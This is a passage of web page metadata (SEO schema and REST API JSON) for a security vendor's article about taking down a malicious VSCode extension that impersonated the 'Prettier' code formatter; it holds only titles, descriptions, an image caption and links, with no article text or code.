class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/checkmarx.com\/zero-post\/checkmarx-zero-takes-down-malicious-prettier-alternative-found-in-vscode-marketplace\/\",\"url\":\"https:\/\/checkmarx.com\/zero-post\/checkmarx-zero-takes-down-malicious-prettier-alternative-found-in-vscode-marketplace\/\",\"name\":\"Checkmarx Zero Takes Down Malicious \u201cPrettier\u201d Alternative Found In VSCode Marketplace - Checkmarx\",\"isPartOf\":{\"@id\":\"https:\/\/checkmarx.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/checkmarx.com\/zero-post\/checkmarx-zero-takes-down-malicious-prettier-alternative-found-in-vscode-marketplace\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/checkmarx.com\/zero-post\/checkmarx-zero-takes-down-malicious-prettier-alternative-found-in-vscode-marketplace\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2025\/11\/cxzero-feature_malicious-vscode-extension_prettier-plus.webp\",\"datePublished\":\"2025-11-21T22:12:59+00:00\",\"dateModified\":\"2026-02-27T18:40:16+00:00\",\"description\":\"Checkmarx Zero took down a malicious VSCode Extension posing as \\\"Prettier Plus\\\" (an apparent attempt to leverage Brandjacking of the legitimate and popular \\\"Prettier\\\").\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/checkmarx.com\/zero-post\/checkmarx-zero-takes-down-malicious-prettier-alternative-found-in-vscode-marketplace\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/checkmarx.com\/zero-post\/checkmarx-zero-takes-down-malicious-prettier-alternative-found-in-vscode-marketplace\/#primaryimage\",\"url\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2025\/11\/cxzero-feature_malicious-vscode-extension_prettier-plus.webp\",\"contentUrl\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2025\/11\/cxzero-feature_malicious-vscode-extension_prettier-plus.webp\",\"width\":2560,\"height\":1280,\"caption\":\"A widescreen, street-art\u2013style digital illustration with a dark, gritty green-to-black palette. At the center, a shadowy figure in a hooded cloak with red, glowing eyes stands in front of a rough urban skyline. On the left, a computer monitor shows the Visual Studio Code logo in purple. On the right, a box-like object displays the multicolored Prettier logo.\"},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/checkmarx.com\/#website\",\"url\":\"https:\/\/checkmarx.com\/\",\"name\":\"Checkmarx\",\"description\":\"The world runs on code. We secure it.\",\"publisher\":{\"@id\":\"https:\/\/checkmarx.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/checkmarx.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/checkmarx.com\/#organization\",\"name\":\"Checkmarx\",\"url\":\"https:\/\/checkmarx.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/checkmarx.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2024\/02\/logo-dark.svg\",\"contentUrl\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2024\/02\/logo-dark.svg\",\"width\":1,\"height\":1,\"caption\":\"Checkmarx\"},\"image\":{\"@id\":\"https:\/\/checkmarx.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/Checkmarx.Source.Code.Analysis\",\"https:\/\/x.com\/checkmarx\",\"https:\/\/www.youtube.com\/user\/CheckmarxResearchLab\",\"https:\/\/www.linkedin.com\/company\/checkmarx\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Checkmarx Zero Takes Down Malicious \u201cPrettier\u201d Alternative Found In VSCode Marketplace - Checkmarx","description":"Checkmarx Zero took down a malicious VSCode Extension posing as \"Prettier Plus\" (an apparent attempt to leverage Brandjacking of the legitimate and popular \"Prettier\").","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/checkmarx.com\/zero-post\/checkmarx-zero-takes-down-malicious-prettier-alternative-found-in-vscode-marketplace\/","og_locale":"en_US","og_type":"article","og_title":"Checkmarx Zero Takes Down Malicious \u201cPrettier\u201d Alternative Found In VSCode Marketplace - Checkmarx","og_description":"Checkmarx Zero took down a malicious VSCode Extension posing as \"Prettier Plus\" (an apparent attempt to leverage Brandjacking of the legitimate and popular \"Prettier\").","og_url":"https:\/\/checkmarx.com\/zero-post\/checkmarx-zero-takes-down-malicious-prettier-alternative-found-in-vscode-marketplace\/","og_site_name":"Checkmarx","article_publisher":"https:\/\/www.facebook.com\/Checkmarx.Source.Code.Analysis","article_modified_time":"2026-02-27T18:40:16+00:00","og_image":[{"width":2560,"height":1280,"url":"https:\/\/checkmarx.com\/wp-content\/uploads\/2025\/11\/cxzero-feature_malicious-vscode-extension_prettier-plus.webp","type":"image\/webp"}],"twitter_card":"summary_large_image","twitter_site":"@checkmarx","twitter_misc":{"Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/checkmarx.com\/zero-post\/checkmarx-zero-takes-down-malicious-prettier-alternative-found-in-vscode-marketplace\/","url":"https:\/\/checkmarx.com\/zero-post\/checkmarx-zero-takes-down-malicious-prettier-alternative-found-in-vscode-marketplace\/","name":"Checkmarx Zero Takes Down Malicious \u201cPrettier\u201d Alternative Found In VSCode Marketplace - Checkmarx","isPartOf":{"@id":"https:\/\/checkmarx.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/checkmarx.com\/zero-post\/checkmarx-zero-takes-down-malicious-prettier-alternative-found-in-vscode-marketplace\/#primaryimage"},"image":{"@id":"https:\/\/checkmarx.com\/zero-post\/checkmarx-zero-takes-down-malicious-prettier-alternative-found-in-vscode-marketplace\/#primaryimage"},"thumbnailUrl":"https:\/\/checkmarx.com\/wp-content\/uploads\/2025\/11\/cxzero-feature_malicious-vscode-extension_prettier-plus.webp","datePublished":"2025-11-21T22:12:59+00:00","dateModified":"2026-02-27T18:40:16+00:00","description":"Checkmarx Zero took down a malicious VSCode Extension posing as \"Prettier Plus\" (an apparent attempt to leverage Brandjacking of the legitimate and popular \"Prettier\").","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/checkmarx.com\/zero-post\/checkmarx-zero-takes-down-malicious-prettier-alternative-found-in-vscode-marketplace\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/checkmarx.com\/zero-post\/checkmarx-zero-takes-down-malicious-prettier-alternative-found-in-vscode-marketplace\/#primaryimage","url":"https:\/\/checkmarx.com\/wp-content\/uploads\/2025\/11\/cxzero-feature_malicious-vscode-extension_prettier-plus.webp","contentUrl":"https:\/\/checkmarx.com\/wp-content\/uploads\/2025\/11\/cxzero-feature_malicious-vscode-extension_prettier-plus.webp","width":2560,"height":1280,"caption":"A widescreen, street-art\u2013style digital illustration with a dark, gritty green-to-black palette. At the center, a shadowy figure in a hooded cloak with red, glowing eyes stands in front of a rough urban skyline. On the left, a computer monitor shows the Visual Studio Code logo in purple. On the right, a box-like object displays the multicolored Prettier logo."},{"@type":"WebSite","@id":"https:\/\/checkmarx.com\/#website","url":"https:\/\/checkmarx.com\/","name":"Checkmarx","description":"The world runs on code. We secure it.","publisher":{"@id":"https:\/\/checkmarx.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/checkmarx.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/checkmarx.com\/#organization","name":"Checkmarx","url":"https:\/\/checkmarx.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/checkmarx.com\/#\/schema\/logo\/image\/","url":"https:\/\/checkmarx.com\/wp-content\/uploads\/2024\/02\/logo-dark.svg","contentUrl":"https:\/\/checkmarx.com\/wp-content\/uploads\/2024\/02\/logo-dark.svg","width":1,"height":1,"caption":"Checkmarx"},"image":{"@id":"https:\/\/checkmarx.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/Checkmarx.Source.Code.Analysis","https:\/\/x.com\/checkmarx","https:\/\/www.youtube.com\/user\/CheckmarxResearchLab","https:\/\/www.linkedin.com\/company\/checkmarx"]}]}},"_links":{"self":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-post\/105794","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-post"}],"about":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/types\/zero-post"}],"author":[{"embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/users\/137"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/media\/105795"}],"wp:attachment":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/media?parent=105794"}],"wp:term":[{"taxonomy":"zero-category","embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-category?post=105794"},{"taxonomy":"zero-tag","embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-tag?post=105794"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}